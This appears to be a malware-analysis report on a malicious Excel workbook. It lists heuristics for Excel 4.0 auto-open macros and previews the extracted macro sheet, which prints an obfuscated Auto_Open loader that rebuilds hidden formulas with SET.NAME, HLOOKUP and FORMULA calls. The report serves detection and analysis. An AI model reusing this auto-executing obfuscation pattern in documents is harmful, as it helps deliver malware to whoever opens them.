MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6600 bytes |
SHA-256: 95f40ba2d3e09fe770e18bfd8023bb02db8003dba0cc6f17c56e7fc5ca5a577e |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - MZoBOYX
' 0018 26 LABEL : Cell Value, String Constant - aTxRpeClyUY len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G156
' 0018 21 LABEL : Cell Value, String Constant - bclhro len=0
' 0018 21 LABEL : Cell Value, String Constant - EChrTK len=0
' 0018 25 LABEL : Cell Value, String Constant - EmhWlmEbQI len=0
' 0018 20 LABEL : Cell Value, String Constant - FeDls len=0
' 0018 25 LABEL : Cell Value, String Constant - hXthUrzKcZ len=0
' 0018 21 LABEL : Cell Value, String Constant - LKzWQk len=0
' 0018 25 LABEL : Cell Value, String Constant - nCYRTOVNvg len=0
' 0018 27 LABEL : Cell Value, String Constant - OHJyARgSuJMD len=0
' 0018 24 LABEL : Cell Value, String Constant - qORwxlHcC len=0
' 0018 27 LABEL : Cell Value, String Constant - rICeOYhHpbxd len=0
' 0018 24 LABEL : Cell Value, String Constant - rWOWUahJi len=0
' 0018 24 LABEL : Cell Value, String Constant - SyXDlcfbk len=0
' 0018 20 LABEL : Cell Value, String Constant - TelMd len=0
' 0018 27 LABEL : Cell Value, String Constant - ufSKyRYxjroH len=0
' 0018 27 LABEL : Cell Value, String Constant - vfqiwvFPSlKb len=0
' 0018 21 LABEL : Cell Value, String Constant - xhXEMS len=0
' 0018 27 LABEL : Cell Value, String Constant - xuFmzdBDBGKZ len=0
' 0018 23 LABEL : Cell Value, String Constant - zdZvJbVm len=0
' 0018 26 LABEL : Cell Value, String Constant - ZKLiDksZVXo len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' MZoBOYX,G57,"SET.NAME("SyXDlcfbk",VALUE("0"))",""
' MZoBOYX,G61,"SET.NAME("ZKLiDksZVXo",SyXDlcfbk)",""
' MZoBOYX,G66,"SET.NAME("aTxRpeClyUY",SyXDlcfbk)",""
' MZoBOYX,G70,"SET.NAME("nCYRTOVNvg",COUNTA(EChrTK))",""
' MZoBOYX,G74,"SET.NAME("EmhWlmEbQI",COUNTA(bclhro))",""
' MZoBOYX,G77,[],""
' MZoBOYX,G79,"SET.NAME("ufSKyRYxjroH","")",""
' MZoBOYX,G81,"ZKLiDksZVXo",""
' MZoBOYX,G85,"SET.NAME("xuFmzdBDBGKZ",HLOOKUP("*",EChrTK,ZKLiDksZVXo,FALSE))",""
' MZoBOYX,G87,"zdZvJbVm",""
' MZoBOYX,G92,"SET.NAME("OHJyARgSuJMD",SyXDlcfbk)",""
' MZoBOYX,G97,[],""
' MZoBOYX,G102,"OHJyARgSuJMD",""
' MZoBOYX,G107,"LKzWQk",""
' MZoBOYX,G111,"TelMd",""
' MZoBOYX,G116,"rWOWUahJi",""
' MZoBOYX,G118,"SET.NAME("hXthUrzKcZ",VALUE(HLOOKUP("*",bclhro,rWOWUahJi,FALSE)))",""
' MZoBOYX,G123,"qORwxlHcC",""
' MZoBOYX,G125,"ufSKyRYxjroH",""
' MZoBOYX,G129,"aTxRpeClyUY",""
' MZoBOYX,G132,NEXT(),""
' MZoBOYX,G137,"rICeOYhHpbxd",""
' MZoBOYX,G142,"SET.NAME("f",INT(T(FORMULA(T(ufSKyRYxjroH)&"",""&T(rICeOYhHpbxd)))))",""
' MZoBOYX,G146,"vfqiwvFPSlKb",""
' MZoBOYX,G150,NEXT(),""
' MZoBOYX,G153,RETURN(),""
' MZoBOYX,G180,"SET.NAME("xhXEMS",G57)",""
' MZoBOYX,G183,"EChrTK",""
' MZoBOYX,G186,"SET.NAME("bclhro",R95C13)",""
' MZoBOYX,G189,"SET.NAME("vfqiwvFPSlKb",197)",""
' MZoBOYX,G191,"SET.NAME("FeDls",7)",""
' MZoBOYX,G196,xhXEMS(),""
' MZoBOYX,G197,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.